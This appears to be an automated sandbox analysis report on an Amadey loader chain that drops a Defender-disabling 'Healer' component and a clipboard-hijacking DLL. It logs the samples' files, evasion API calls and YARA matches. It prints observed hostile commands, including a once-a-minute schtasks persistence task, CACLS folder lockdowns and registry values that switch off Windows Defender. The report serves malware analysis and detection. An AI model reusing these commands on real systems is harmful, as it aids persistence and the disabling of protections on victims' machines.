                          Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                          Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                          Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                          Source: file.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                          Source: Binary string: wextract.pdb source: file.exe, bjAg.exe.0.dr
                          Source: Binary string: D:\Mktmp\Amadey\Release\Amadey.pdb source: file.exe, 00000000.00000003.307249151.0000000004A44000.00000004.00000020.00020000.00000000.sdmp, xriv.exe, 00000008.00000000.443385689.000000000019E000.00000002.00000001.01000000.00000009.sdmp, xriv.exe, 00000008.00000002.445541983.000000000019E000.00000002.00000001.01000000.00000009.sdmp, mnolyk.exe, 00000009.00000000.445170122.0000000000DAE000.00000002.00000001.01000000.0000000A.sdmp, mnolyk.exe, 00000009.00000002.828007613.0000000000DAE000.00000002.00000001.01000000.0000000A.sdmp, mnolyk.exe, 00000015.00000000.451693507.0000000000DAE000.00000002.00000001.01000000.0000000A.sdmp, mnolyk.exe, 00000015.00000002.452166128.0000000000DAE000.00000002.00000001.01000000.0000000A.sdmp, xriv.exe.0.dr, mnolyk.exe.8.dr
                          Source: Binary string: Healer.pdb source: ajAf.exe, 00000002.00000002.414760321.0000000002210000.00000004.08000000.00040000.00000000.sdmp, ajAf.exe, 00000002.00000002.414947367.00000000025F1000.00000004.00000800.00020000.00000000.sdmp, ajAf.exe, 00000002.00000002.414637358.0000000001FF0000.00000004.00000020.00020000.00000000.sdmp, ajAf.exe, 00000002.00000002.414918695.00000000025B0000.00000004.08000000.00040000.00000000.sdmp
                          Source: Binary string: wextract.pdbGCTL source: file.exe, bjAg.exe.0.dr
                          Source: Binary string: C:\Users\Admin\source\repos\Healer\Healer\obj\Release\Healer.pdb source: bjAg.exe, 00000001.00000003.308200379.0000000000D2D000.00000004.00000020.00020000.00000000.sdmp, bjAg.exe, 00000001.00000003.308124851.0000000004873000.00000004.00000020.00020000.00000000.sdmp, nika.exe, 00000007.00000000.415603805.0000000000792000.00000002.00000001.01000000.00000008.sdmp, nika.exe.1.dr
                          Source: Binary string: _.pdb source: ajAf.exe, 00000002.00000002.414760321.0000000002210000.00000004.08000000.00040000.00000000.sdmp, ajAf.exe, 00000002.00000002.414947367.00000000025F1000.00000004.00000800.00020000.00000000.sdmp, ajAf.exe, 00000002.00000002.414637358.0000000001FF0000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: D:\Mktmp\Amadey\ClipperDLL\Release\CLIPPERDLL.pdb source: rundll32.exe, 00000014.00000002.827912783.000000006E7EF000.00000002.00000001.01000000.0000000C.sdmp, clip64.dll.9.dr, clip64[1].dll.9.dr
                          Source: Binary string: Healer.pdbH5 source: ajAf.exe, 00000002.00000002.414760321.0000000002210000.00000004.08000000.00040000.00000000.sdmp, ajAf.exe, 00000002.00000002.414947367.00000000025F1000.00000004.00000800.00020000.00000000.sdmp, ajAf.exe, 00000002.00000002.414637358.0000000001FF0000.00000004.00000020.00020000.00000000.sdmp, ajAf.exe, 00000002.00000002.414918695.00000000025B0000.00000004.08000000.00040000.00000000.sdmp
                          Source: Binary string: C:\vot.pdb source: bjAg.exe, 00000001.00000003.308124851.000000000485F000.00000004.00000020.00020000.00000000.sdmp, ajAf.exe, 00000002.00000000.308294007.0000000000401000.00000020.00000001.01000000.00000005.sdmp, ajAf.exe.1.dr

                          Data Obfuscation

                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\ajAf.exeUnpacked PE file: 2.2.ajAf.exe.400000.0.unpack
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\ajAf.exeUnpacked PE file: 2.2.ajAf.exe.400000.0.unpack .text:ER;.data:W;.weh:R;.lami:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010C724D push ecx; ret 0_2_010C7260
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bjAg.exeCode function: 1_2_0109724D push ecx; ret 1_2_01097260
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\ajAf.exeCode function: 2_2_0041C40C push cs; iretd 2_2_0041C4E2
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\ajAf.exeCode function: 2_2_00423149 push eax; ret 2_2_00423179
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\ajAf.exeCode function: 2_2_0041C50E push cs; iretd 2_2_0041C4E2
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\ajAf.exeCode function: 2_2_004231C8 push eax; ret 2_2_00423179
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\ajAf.exeCode function: 2_2_0040E21D push ecx; ret 2_2_0040E230
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\ajAf.exeCode function: 2_2_0041C6BE push ebx; ret 2_2_0041C6BF
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\ajAf.exeCode function: 2_2_01FDC125 push ebx; ret 2_2_01FDC126
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\ajAf.exeCode function: 2_2_01FCE484 push ecx; ret 2_2_01FCE497
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\ajAf.exeCode function: 2_2_01FDBF75 push cs; iretd 2_2_01FDBF49
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\ajAf.exeCode function: 2_2_01FDBE73 push cs; iretd 2_2_01FDBF49
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\ajAf.exeCode function: 2_2_02234139 push edi; iretd 2_2_0223414E
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\ajAf.exeCode function: 2_2_0223454E push ecx; retf 2_2_02234554
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeCode function: 8_2_00187D26 push ecx; ret 8_2_00187D39
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeCode function: 8_2_0017F748 push E8FFFFFBh; iretd 8_2_0017F74D
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010C2F1D GetSystemDirectoryA,LoadLibraryA,GetProcAddress,DecryptFileA,FreeLibrary,SetCurrentDirectoryA,0_2_010C2F1D
                          Source: nika.exe.1.drStatic PE information: 0xE382D401 [Fri Dec 15 06:19:45 2090 UTC]
                          Source: ajAf.exe.1.drStatic PE information: section name: .weh
                          Source: ajAf.exe.1.drStatic PE information: section name: .lami

                          Persistence and Installation Behavior

                          Source: Yara matchFile source: dump.pcap, type: PCAP
                          Source: Yara matchFile source: 00000009.00000002.827863468.0000000000A72000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000009.00000002.827863468.00000000009FA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000009.00000003.581791427.0000000000A86000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000009.00000002.827863468.0000000000A86000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000009.00000003.581742963.0000000000A72000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000009.00000003.581742963.0000000000A86000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000009.00000002.827863468.0000000000A39000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe File created: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\clip64[1].dll
                          Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe File created: C:\Users\user\AppData\Roaming\c1ec479e5342a2\clip64.dll
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bjAg.exe File created: C:\Users\user\AppData\Local\Temp\IXP001.TMP\ajAf.exe
                          Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bjAg.exe
                          Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bjAg.exe File created: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exe
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010C1AE8 CompareStringA,GetFileAttributesA,LocalAlloc,GetPrivateProfileIntA,GetPrivateProfileStringA,GetShortPathNameA,CompareStringA,LocalAlloc,LocalAlloc,GetFileAttributesA,0_2_010C1AE8
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bjAg.exeCode function: 1_2_01091AE8 CompareStringA,GetFileAttributesA,LocalAlloc,GetPrivateProfileIntA,GetPrivateProfileStringA,GetShortPathNameA,CompareStringA,LocalAlloc,LocalAlloc,GetFileAttributesA,1_2_01091AE8

                          Boot Survival

                          Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN mnolyk.exe /TR "C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe" /F
                          Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe Key value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders Startup
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cacls.exe CACLS "mnolyk.exe" /P "user:N"
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\ajAf.exe Process information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exe Process information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe Process information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe Process information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\ajAf.exe TID: 5132 Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exe TID: 5848 Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe TID: 5784 Thread sleep count: 171 > 30
                          Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe TID: 5784 Thread sleep time: -5130000s >= -30000s
                          Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe TID: 5316 Thread sleep time: -50000s >= -30000s
                          Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe TID: 5912 Thread sleep count: 39 > 30
                          Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe TID: 4948 Thread sleep count: 38 > 30
                          Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe TID: 4948 Thread sleep time: -6840000s >= -30000s
                          Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe TID: 5784 Thread sleep time: -30000s >= -30000s
                          Source: C:\Windows\SysWOW64\rundll32.exe TID: 2540 Thread sleep count: 166 > 30
                          Source: C:\Windows\SysWOW64\rundll32.exe TID: 2540 Thread sleep time: -166000s >= -30000s
                          Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe Last function: Thread delayed
                          Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe Last function: Thread delayed
                          Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
                          Source: C:\Windows\SysWOW64\rundll32.exe Last function: Thread delayed
                          Source: C:\Windows\SysWOW64\rundll32.exe Last function: Thread delayed
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\ajAf.exe Code function: 2_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,2_2_004019F0
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\ajAf.exe Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess graph_2-26001
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\ajAf.exe Evasive API call chain: GetModuleFileName,DecisionNodes,Sleep graph_2-25741
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\ajAf.exe Thread delayed: delay time: 922337203685477
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exe Thread delayed: delay time: 922337203685477
                          Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe Thread delayed: delay time: 180000
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bjAg.exe Check user administrative privileges: GetTokenInformation,DecisionNodes graph_1-2575
                          Source: C:\Users\user\Desktop\file.exe Check user administrative privileges: GetTokenInformation,DecisionNodes graph_0-2569
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe API coverage: 6.1 %
                          Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\clip64[1].dll
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\ajAf.exe Thread delayed: delay time: 922337203685477
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exe Thread delayed: delay time: 922337203685477
                          Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe Thread delayed: delay time: 30000
                          Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe Thread delayed: delay time: 50000
                          Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe Thread delayed: delay time: 180000
                          Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe Thread delayed: delay time: 30000
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\ajAf.exe API call chain: ExitProcess graph end node graph_2-26003
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\ajAf.exe Process information queried: ProcessInformation
                          Source: C:\Users\user\Desktop\file.exe Code function: 0_2_010C5467 GetSystemInfo,CreateDirectoryA,RemoveDirectoryA,0_2_010C5467
                          Source: C:\Users\user\Desktop\file.exe Code function: 0_2_010C2390 FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,0_2_010C2390
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bjAg.exe Code function: 1_2_01092390 FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,1_2_01092390
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe Code function: 8_2_0018FC58 FindFirstFileExW,8_2_0018FC58
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\ajAf.exe Code function: 2_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,2_2_004019F0
                          Source: C:\Users\user\Desktop\file.exe Code function: 0_2_010C2F1D GetSystemDirectoryA,LoadLibraryA,GetProcAddress,DecryptFileA,FreeLibrary,SetCurrentDirectoryA,0_2_010C2F1D
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\ajAf.exe Code function: 2_2_01FC092B mov eax, dword ptr fs:[00000030h] 2_2_01FC092B
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\ajAf.exe Code function: 2_2_01FC0D90 mov eax, dword ptr fs:[00000030h] 2_2_01FC0D90
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe Code function: 8_2_0018A9A1 mov eax, dword ptr fs:[00000030h] 8_2_0018A9A1
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe Code function: 8_2_0018CFB2 mov eax, dword ptr fs:[00000030h] 8_2_0018CFB2
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\ajAf.exe Code function: 2_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_0040CE09
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\ajAf.exe Code function: 2_2_0040ADB0 GetProcessHeap,HeapFree,2_2_0040ADB0
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\ajAf.exe Process token adjusted: Debug
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exe Process token adjusted: Debug
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\ajAf.exe Memory allocated: page read and write | page guard
                          Source: C:\Users\user\Desktop\file.exe Code function: 0_2_010C6F40 SetUnhandledExceptionFilter,0_2_010C6F40
                          Source: C:\Users\user\Desktop\file.exe Code function: 0_2_010C6CF0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_010C6CF0
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bjAg.exe Code function: 1_2_01096F40 SetUnhandledExceptionFilter,1_2_01096F40
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bjAg.exe Code function: 1_2_01096CF0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_01096CF0
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\ajAf.exe Code function: 2_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_0040CE09
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\ajAf.exe Code function: 2_2_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_0040E61C
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\ajAf.exe Code function: 2_2_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00416F6A
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\ajAf.exe Code function: 2_2_004123F1 SetUnhandledExceptionFilter,2_2_004123F1
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\ajAf.exe Code function: 2_2_01FD71D1 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_01FD71D1
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\ajAf.exe Code function: 2_2_01FCE883 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_01FCE883
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\ajAf.exe Code function: 2_2_01FCD070 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_01FCD070
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\ajAf.exe Code function: 2_2_01FD2658 SetUnhandledExceptionFilter,2_2_01FD2658
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe Code function: 8_2_00187A74 SetUnhandledExceptionFilter,8_2_00187A74
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe Code function: 8_2_0018790F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_2_0018790F
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe Code function: 8_2_00187208 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,8_2_00187208
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe Code function: 8_2_0018BB20 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_2_0018BB20

                          HIPS / PFW / Operating System Protection Evasion

                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe Code function: 8_2_001738C0 GetModuleFileNameA,CreateProcessA,VirtualAlloc,GetThreadContext,ReadProcessMemory,GetModuleHandleA,GetProcAddress,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,ResumeThread,VirtualFree,VirtualFree,8_2_001738C0
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe Process created: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe "C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe"
                          Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN mnolyk.exe /TR "C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe" /F
                          Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "mnolyk.exe" /P "user:N"&&CACLS "mnolyk.exe" /P "user:R" /E&&echo Y|CACLS "..\4b9a106e76" /P "user:N"&&CACLS "..\4b9a106e76" /P "user:R" /E&&Exit
                          Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\c1ec479e5342a2\clip64.dll, Main
                          Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                          Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cacls.exe CACLS "mnolyk.exe" /P "user:N"
                          Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cacls.exe CACLS "mnolyk.exe" /P "user:R" /E
                          Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                          Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cacls.exe CACLS "..\4b9a106e76" /P "user:N"
                          Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cacls.exe CACLS "..\4b9a106e76" /P "user:R" /E
                          Source: C:\Users\user\Desktop\file.exe Code function: 0_2_010C18A3 GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,AllocateAndInitializeSid,EqualSid,FreeSid,LocalFree,CloseHandle,0_2_010C18A3
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\ajAf.exe Code function: GetLocaleInfoA,2_2_00417A20
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\ajAf.exe Code function: GetLocaleInfoA,2_2_01FD7C87
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\ajAf.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exe Queries volume information: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exe VolumeInformation
                          Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe Queries volume information: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe VolumeInformation
                          Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe Queries volume information: C:\Users\user\AppData\Roaming\c1ec479e5342a2\cred64.dll VolumeInformation
                          Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe Queries volume information: C:\Users\user\AppData\Roaming\c1ec479e5342a2\cred64.dll VolumeInformation
                          Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe Queries volume information: C:\Users\user\AppData\Roaming\c1ec479e5342a2\clip64.dll VolumeInformation
                          Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe Queries volume information: C:\Users\user\AppData\Roaming\c1ec479e5342a2\clip64.dll VolumeInformation
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe Code function: 8_2_00187AFC cpuid 8_2_00187AFC
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\ajAf.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                          Source: C:\Users\user\Desktop\file.exe Code function: 0_2_010C7176 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,0_2_010C7176
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe Code function: 8_2_00193C76 _free,_free,_free,GetTimeZoneInformation,_free,8_2_00193C76
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exe Code function: 7_2_00007FF9A793077D GetUserNameA,7_2_00007FF9A793077D
                          Source: C:\Users\user\Desktop\file.exe Code function: 0_2_010C2BFB GetVersion,GetModuleHandleW,GetProcAddress,CloseHandle,0_2_010C2BFB

                          Lowering of HIPS / PFW / Operating System Security Settings

                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\ajAf.exe Registry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection DisableIOAVProtection 1
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\ajAf.exe Registry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications DisableNotifications 1

                          Stealing of Sensitive Information

                          Source: Yara match File source: 2.2.ajAf.exe.1fc0e67.1.raw.unpack, type: UNPACKEDPE
                          Source: Yara match File source: 2.3.ajAf.exe.1ff0000.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara match File source: 2.2.ajAf.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara match File source: 2.2.ajAf.exe.400000.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara match File source: 00000002.00000002.414584298.0000000001FC0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara match File source: 00000002.00000003.390341867.0000000001FF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara match File source: 00000002.00000002.413978160.0000000000400000.00000040.00000001.01000000.00000005.sdmp, type: MEMORY
                          Source: Yara match File source: 9.2.mnolyk.exe.d80000.0.unpack, type: UNPACKEDPE
                          Source: Yara match File source: 0.3.file.exe.4aa7620.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara match File source: 8.2.xriv.exe.170000.0.unpack, type: UNPACKEDPE
                          Source: Yara match File source: 21.2.mnolyk.exe.d80000.0.unpack, type: UNPACKEDPE
                          Source: Yara match File source: 8.0.xriv.exe.170000.0.unpack, type: UNPACKEDPE
                          Source: Yara match File source: 9.0.mnolyk.exe.d80000.0.unpack, type: UNPACKEDPE
                          Source: Yara match File source: 21.0.mnolyk.exe.d80000.0.unpack, type: UNPACKEDPE
                          Source: Yara match File source: 0.3.file.exe.4aa7620.0.unpack, type: UNPACKEDPE
                          Source: Yara match File source: 00000009.00000002.827977648.0000000000D81000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY
                          Source: Yara match File source: 00000008.00000000.443338469.0000000000171000.00000020.00000001.01000000.00000009.sdmp, type: MEMORY
                          Source: Yara match File source: 00000000.00000003.307249151.0000000004A44000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara match File source: 00000008.00000002.445406570.0000000000171000.00000020.00000001.01000000.00000009.sdmp, type: MEMORY
                          Source: Yara match File source: 00000009.00000000.445122215.0000000000D81000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY
                          Source: Yara match File source: 00000015.00000002.452140965.0000000000D81000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY
                          Source: Yara match File source: 00000015.00000000.451650195.0000000000D81000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY
                          Source: Yara match File source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe, type: DROPPED
